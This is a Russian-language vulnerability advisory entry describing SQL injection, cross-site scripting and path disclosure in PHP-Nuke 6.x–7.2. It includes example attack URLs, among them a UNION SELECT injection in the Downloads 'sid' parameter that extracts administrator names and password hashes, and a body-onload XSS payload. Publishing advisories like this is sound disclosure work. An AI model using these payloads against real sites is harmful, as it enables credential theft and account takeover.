SQL инъекция и XSS в PHP-NUKE
| Дата публикации: | 07.05.2004 |
| Всего просмотров: | 2550 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: PHP-Nuke 6.x -7.2
Описание: Несколько уязвимостей обнаружено в PHP-NUKE. Удаленный пользователь может внедрить SQl команды и выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь. 1. SQL инъекция в Downloads модуле в 'sid' переменной. Пример: http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdo wnload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_autho2. 2. XSS в Downloads модуле в 'ttitle' переменной. Пример: http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss code here] http://localhost/nuke72/modules.php?name =Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>3. Раскрытие инсталляционного пути: http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar URL производителя:http://www.phpnuke.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | [waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2] |